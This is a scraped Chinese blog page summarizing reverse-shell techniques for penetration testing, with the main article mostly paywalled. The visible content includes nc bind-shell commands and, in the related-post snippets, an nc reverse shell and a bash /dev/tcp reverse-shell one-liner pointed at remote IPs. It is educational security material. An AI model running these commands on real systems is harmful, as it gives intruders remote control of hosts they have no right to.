反弹shell总结

已于 2023-12-06 21:43:30 修改
阅读量1.9k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: 网络安全 web安全 安全 运维 linux 服务器
于 2023-08-31 17:51:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_54626591/article/details/132606290
网络安全 专栏收录该内容
218 篇文章 ¥299.90 ¥399.90
订阅专栏
本文详细总结了各种Linux反弹shell的技术,包括nc、python、bash、PHP、Perl、Java等语言实现的反弹shell,以及socat、ruby、lua、awk、exec等工具和方法。此外,还介绍了在目标主机没有nc时如何获取反向shell,以及通过msfvenom生成反弹shell。文章适用于网络安全和Web安全领域的专业人士,帮助他们更好地理解和利用反弹shell进行渗透测试。

反弹shell总结



讲在前面说的话:

没有任何基础的 推荐 【技术分享】linux各种一句话反弹shell总结



反弹shell总结

nc反弹shell

正向shell
nc -lvp 1234 -e /bin/bash # linux  服务端(被攻击的主机)

nc -lvp 1234 -e c:\windows\system32\cmd.exe # windows 服务端(被攻击的主机)


                

                
                
        

    


  


        

                

                  

                  

                  了解本专栏
                  
                  
                    
                  订阅专栏 解锁全文
                   
                

        


    



                



	

		

			

				
					
Linux 强大的网络命令:nc命令操作方法

				
			

			

				

					嵌入式技术开发
				

				

					01-22
					
					1178
					
				

			

		

		

			
				
通过Netcat,您可以自定义传输的数据包格式。" | nc 目标主机IP 1234这将向目标主机的1234端口发送自定义格式的数据包。

			
		

	



                

            
              



	

		

			

				
					
Php shell端口反弹,Linux下通过webshell反弹shell总结

				
			

			

				

					weixin_33253503的博客
				

				

					03-12
					
					569
					
				

			

		

		

			
				
反弹shell原因:Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是溢出必须在可交互环境运行,否则如果直接在WebShell执行,即使能溢出提权成功,也没法 利用。因此必须要反弹一个Shell命令行窗口,在命令行终端下执行溢出进行提权。nc命令参数:参  数:-g设置路由器跃程通信网关,最丢哦可设置8个。-G设置来源路由指向器,其数值为...

			
		

	



              


  
              

                


	

		

			

				
					
nc命令简单使用

				
			

			

				

					liutao43的博客
				

				

					04-07
					
					2322
					
				

			

		

		

			
				
参考:
https://blog.youkuaiyun.com/qq_42906907/article/details/103458718
linux nc命令
简介:
nc是netcat的简称,有着网络界瑞士军刀的美称,被称为简单可靠的操作系统的网络工具。
功能
监听任意TCP/UDP端口的侦听
端口的扫描
机器之间传输文件
机器之间网络测速
控制参数

由于nc命令默认是做客户端使用的,所以使用-l参数,用于指定nc将处于监听模式。意味着这时的nc被当作server,侦听并接受连接,而非向其它地址发起连接。
探测主

			
		

	





	

		

			

				
					
man nc 中文版

				
			

			

				

					继学先生
				

				

					04-11
					
					1317
					
				

			

		

		

			
				
(1)                             BSD 常规命令指南          名字: 
    nc  -  连接、监听任意的TCP和UDP。 
概要: 
    nc [-46DdhklnrStUuvzC] [-i 间隔] [-p 源端口]  
        [-s 源IP地址] [-T 服务类型] [-w 超时时间] [-X 代理协议] 
        [-x 代理

			
		

	



		

			
		



	

		

			

				
					
nc 监听数据_nc命令使用解析大全

				
			

			

				

					weixin_33701632的博客
				

				

					12-24
					
					5360
					
				

			

		

		

			
				
名称nc - 任意的TCP和UDp连接与监听工具概要nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port][-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol] [-xproxy_address[:port]] [hostname] [port[s]]描述nc(或者netc...

			
		

	





	

		

			

				
					
内网渗透:nc反弹shell总结

				
			

			

				

					安全大白
				

				

					01-03
					
					6739
					
				

			

		

		

			
				
1、实验环境
Kali:192.168.32.132	//模拟靶机
Windows:192.168.32.1		//模拟公网vps
2、若靶机上存在nc,获取反向shell:
vps攻击机:nc -lvp 9999			// 监听9999端口
靶机:nc 1.1.1.1 9999 -e /bin/bash	// Linux正向连接公网vps1.1.1.1的9999端口
     nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe  // Windows



3、若

			
		

	





	

		

			

				
					
Linux反弹shell总结与实践

				
			

			

				

					不想当脚本小子的脚本小子
				

				

					12-05
					
					333
					
				

			

		

		

			
				
最近在学习的时候碰到了利用kali写反弹shell的操作,趁着有空的时候过来系统学习一下。给1.什么情况下需要写入反弹shell。2.如何写入反弹shell 3.反弹shell成功的原理是什么 4.反弹shell有没有什么变形。5.反弹shell有哪些方法?

 当我去攻击一台机器的时候,通过该机器的端口以及端口提供的服务(SSH、telnet等等)可以直接去连接到这台机器,但是如果连不上这台机器那就不如让它弹一个shell回来(可以理解为从对方的机器上拿一个控制权到自己手里),比如这个机器在内网里,...

			
		

	





	

		

			

				
					
nc具体用法

				
			

			

				

					嘻嘻哈哈
				

				

					01-24
					
					7686
					
				

			

		

		

			
				
nc简介



1、nc

nc全称netcat,又叫做瑞士军刀,是一款简单、可靠的网络工具



2、nc的作用


实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口
端口扫描,nc可以作为client发起TCP或UDP连接
机器之间传输文件
机器之间网络测速




3、常用参数



-l:用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作s

			
		

	





	

		

			

				
					
linux nc命令使用详解

				
			

			

				

					chbxw
				

				

					08-16
					
					6165
					
				

			

		

		

			
				
linux nc命令使用详解

功能说明:功能强大的网络工具 
语  法:nc [-hlnruz][-g<网关…>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v…][-w<超时秒数>][主机名称][通信端口…] 
参  数: 
 -g<网

			
		

	





	

		

			

				
					
Linux中的nc测试端口是否开放

				
			

			

				

					weixin_30307267的博客
				

				

					08-09
					
					1286
					
				

			

		

		

			
				
nc测试端口是否开放
在Linux中有一个级强大的网络工具netcat,在默认情况下面都是没有安装的,现在介绍一下安装过程其实安装很简单
一、安装使用
1、只需输入命令yum安装:

[root@SZB-L0032015 ~]# yum install -y nc


[root@SZB-L0032015 ~]# yum install -y nc
Loaded plugins...

			
		

	





	

		

			

				
					
NC工具的使用说明教程

					
热门推荐

				
			

			

				

					xysoul的专栏
				

				

					08-21
					
					9万+
					
				

			

		

		

			
				
nc的使用方法

netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧......
一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 

在中国,它

			
		

	





	

		

			

				
					
图文介绍——NC使用笔记

				
			

			

				

					LainWith的博客
				

				

					01-20
					
					8557
					
				

			

		

		

			
				
NC

简介
Netcat 简称为nc,中文名网猫,被誉为网络工具中的瑞士军刀。具备以下功能:

侦听模式/传输模式
telnet/获取 banner信息(当作telent工具使用,甚至更好用)
传输文本信息(可以作为聊天工具)
传输文件/目录
加密传输文件
远程控制/木马(一般来说,不会被查杀)
加密所有流量
流媒体服务器
远程克隆硬盘(一般用作电子取证)

nc 有很多变种。不同的变种,会在原有 nc 的基础上增加一些新功能。比较流行的变种之一是OpenBSD 社区的变种(也叫“OpenBSD netc

			
		

	





	

		

			

				
					
windows 反弹shell_反弹shell的各种姿势

				
			

			

				

					weixin_39800331的博客
				

				

					11-27
					
					502
					
				

			

		

		

			
				
来自公众号:Bypass在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。本文所有姿势整理自网络,并基于同一个假设的前提下完成测试和验证。(假设:攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。)Linu...

			
		

	





	

		

			

				
					
内网渗透-端口转发隧道技术

				
			

			

				

					weixin_60329395的博客
				

				

					08-02
					
					2489
					
				

			

		

		

			
				
代理和隧道技术区别、代理只是为了解决网络通信问题,有些内网访问不到,可以用代理实现、隧道不仅是解决网络的通信问题,更大的作用是绕过过滤,突破防火墙/入侵检测系统。(封装协议)

			
		

	





	

		

			

				
					
linuxnc的使用

				
			

			

				

					weixin_33962923的博客
				

				

					04-26
					
					312
					
				

			

		

		

			
				
linuxnc的使用
今天在饮水思源上闲逛,看到了一个贴子关于Linuxnc命来实现文件传输,进行学习了解了一下。
发送端:
cattest.txt | nc -l -p 6666
或者nc -l -p 6666 < test.txt
【监听6666端口,等待连接】(设发送端IP为10.20.133.152)
接收端:
nc 10.20.13...

			
		

	





	

		

			

				
					
内网中使用netcat进行正向和反向获取shell

				
			

			

				

					bring_coco的博客
				

				

					12-07
					
					4707
					
				

			

		

		

			
				
本次演示在linux环境下
一般用外网机器对内网机器进行访问时,多用反向shell,内网机器与内网机器之间多用正向shell
正向shell
由于内网及其属于边界服务器,因此我们先进行正向shell演示(正向shell是在目标机器上进行监听):
内网机器上命令:nc -lvp 4444 -e /bin/sh
本地机器上命令:nc 10.0.78.41 4444

显示已经连接
进行验证:

说明正向连接成功
反向shell
反向shell是在本地vps上进行监听,目标机器进行连接
本地机器上命令:nc -l

			
		

	





	

		

			

				
					
Linux Shell脚本编程--nc命令使用详解

				
			

			

				

					上善若水,水善利万物而不争。
				

				

					08-25
					
					3万+
					
				

			

		

		

			
				
linux nc命令使用详解
    
功能说明:功能强大的网络工具
语 法:nc [-hlnruz][-g网关...>][-G指向器数目>][-i延迟秒数>][-o输出文件>][-p通信端口>][-s来源位址>][-v...][-w超时秒数>][主机名称][通信端口...]
参 数:
 -g网关> 
设置路由器跃程通信网关,最丢哦可设置8个。
 -G指向器数目> 
设置来源路由指

			
		

	





	

		

			

				
					
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》

				
			

			

				

					weixin_59086772的博客
				

				

					10-18
					
					8836
					
				

			

		

		

			
				
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。

今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。







一、网络安全行业市场发展情况

网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.

			
		

	





	

		

			

				
					
公网实现反弹shell

				
			

			

				

					07-27
				

			

		

		

			
				
公网实现反弹shell的方法有多种。具体要选择哪种方法取决于目标主机的环境和可用工具。如果目标主机上安装有netcat,可以利用netcat反弹shell。如果具有python环境,可以利用python反弹shell。如果具有php环境,可以利用php反弹shell。另外,还可以使用其他工具和技术来实现反弹shell。

举个例子,如果你想在受害机CentOS 7上生成一个反弹shell,连接到宿主机的公网IP地址为10.8.163.224,端口为6666,可以使用以下命令实现端口转发,从而连接到Kali虚拟机上:
bash -i >& /dev/tcp/10.8.163.224/6666 0>&1 \[2\]

另外,如果你想利用netcat来实现反弹shell,可以使用Netcat工具。Netcat是一款简单的Unix工具,使用UDP和TCP协议。它可以作为后台操作工具,也可以用作网络测试工具或黑客工具。通过使用Netcat,你可以轻松地建立任何连接。\[3\]

需要注意的是,反弹shell是一种潜在的安全风险,应该谨慎使用,并且仅在合法和授权的情况下使用。
#### 引用[.reference_title]
-  *1* *3* [反弹shell总结](https://blog.youkuaiyun.com/weixin_51692662/article/details/127795576)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item]
-  *2* [如何用内网虚拟机kali实现反弹shell](https://blog.youkuaiyun.com/qq_44657899/article/details/106307545)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item]
[ .reference_list ]

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
坦笑&&life

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值